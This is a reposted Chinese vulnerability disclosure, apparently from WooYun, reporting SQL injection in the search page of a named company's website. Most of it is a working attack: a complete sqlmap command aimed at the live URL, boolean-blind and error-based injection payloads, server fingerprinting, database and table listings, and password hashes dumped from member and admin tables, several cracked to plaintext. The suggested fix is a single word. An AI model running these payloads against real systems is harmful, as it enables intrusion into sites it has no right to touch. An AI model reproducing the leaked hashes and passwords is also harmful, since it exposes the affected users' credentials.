神刀安全网

漏洞标题: 苏州艾姆阿欧机电设备有限公司www主站存在SQL注入漏洞(大量用户密码)

漏洞详情

披露状态:

2016-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域
$ python sqlmap.py -u "http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8
%E5%99%A8" -p tag --technique=BE --output-dir=output --random-agent --batch --
no-cast --current-user --is-dba --users --passwords --count --search -C pass

code 区域
Database: ehs360.com_2010
Table: ehse_member
[15 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 156a1a6f6ea26d3456e7ab65f0e6f86c |
| 1c88d37be4e1d375f341d906f58288f4 (201314) |
| 2205e69e7376e166b68f431614c848b1 |
| 3fc44fddce2f58ec26b3871190982993 (imissyou) |
| 73d714bd2fd44248f0206b9dce94fdf7 |
| 7fef5b36f121d34f4e11219f88c9f89a |
| 8267ddabf72bff6a84ea53db8bc2e8b7 |
| 887ba5be6381df15715cdc9b15034a67 |
| 9e0fb72c88ee523675e4f1a25b970d92 |
| a88edfd5974d1c11c459e0c025a1bc1f |
| ae47913d58aee2c5941efb7def7b863e |
| df3192aef281ee9a36a2d43bbd520177 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e982bbd2514d2e3577282738ea53b002 |
| eabd8ce9404507aa8c22714d3f5eada9 (aaa111) |
+---------------------------------------------+

Database: ehs360.com_2010
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

Database: ehs360.com
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

漏洞证明:

code 区域
---
Parameter: tag (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND 7092=7092 AND '%'='

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND (SELECT 4599 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4599=4599,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL 5.0
current user: '[email protected]'
current user is DBA: False
database management system users [1]:
[*] 'ehs360.com'@'localhost'

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 588 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 272 |
| SESSION_VARIABLES | 272 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PARTITIONS | 52 |
| TABLES | 52 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 36 |
| KEY_COLUMN_USAGE | 22 |
| STATISTICS | 22 |
| TABLE_CONSTRAINTS | 22 |
| PLUGINS | 10 |
| ENGINES | 8 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

Database: ehs360.com
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ehse_promodel | 8985 |
| ehse_attachment | 6690 |
| ehse_pro | 4904 |
| ehse_article | 1230 |
| ehse_protype | 596 |
| ehse_manage | 2 |
| ehse_gbook | 1 |
+---------------------------------------+---------+

Database: ehs360.com_2010
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ehse_promodel | 8975 |
| ehse_pro_has_tag | 8482 |
| ehse_attachment | 6033 |
| ehse_pro | 4447 |
| ehse_article | 1203 |
| ehse_pro0 | 871 |
| ehse_protype | 544 |
| ehse_protag | 413 |
| ehse_gbook | 35 |
| ehse_inquiry | 21 |
| ehse_member | 15 |
| ehse_page | 12 |
| ehse_config | 11 |
| ehse_articletype | 2 |
| ehse_manage | 2 |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: ehs360.com_2010
Table: ehse_member
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+

Database: ehs360.com_2010
Table: ehse_manage
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+

Database: ehs360.com
Table: ehse_manage
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+

Database: ehs360.com_2010
Table: ehse_member
[15 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 156a1a6f6ea26d3456e7ab65f0e6f86c |
| 1c88d37be4e1d375f341d906f58288f4 (201314) |
| 2205e69e7376e166b68f431614c848b1 |
| 3fc44fddce2f58ec26b3871190982993 (imissyou) |
| 73d714bd2fd44248f0206b9dce94fdf7 |
| 7fef5b36f121d34f4e11219f88c9f89a |
| 8267ddabf72bff6a84ea53db8bc2e8b7 |
| 887ba5be6381df15715cdc9b15034a67 |
| 9e0fb72c88ee523675e4f1a25b970d92 |
| a88edfd5974d1c11c459e0c025a1bc1f |
| ae47913d58aee2c5941efb7def7b863e |
| df3192aef281ee9a36a2d43bbd520177 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e982bbd2514d2e3577282738ea53b002 |
| eabd8ce9404507aa8c22714d3f5eada9 (aaa111) |
+---------------------------------------------+

Database: ehs360.com_2010
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

Database: ehs360.com
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 苏州艾姆阿欧机电设备有限公司www主站存在SQL注入漏洞(大量用户密码)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址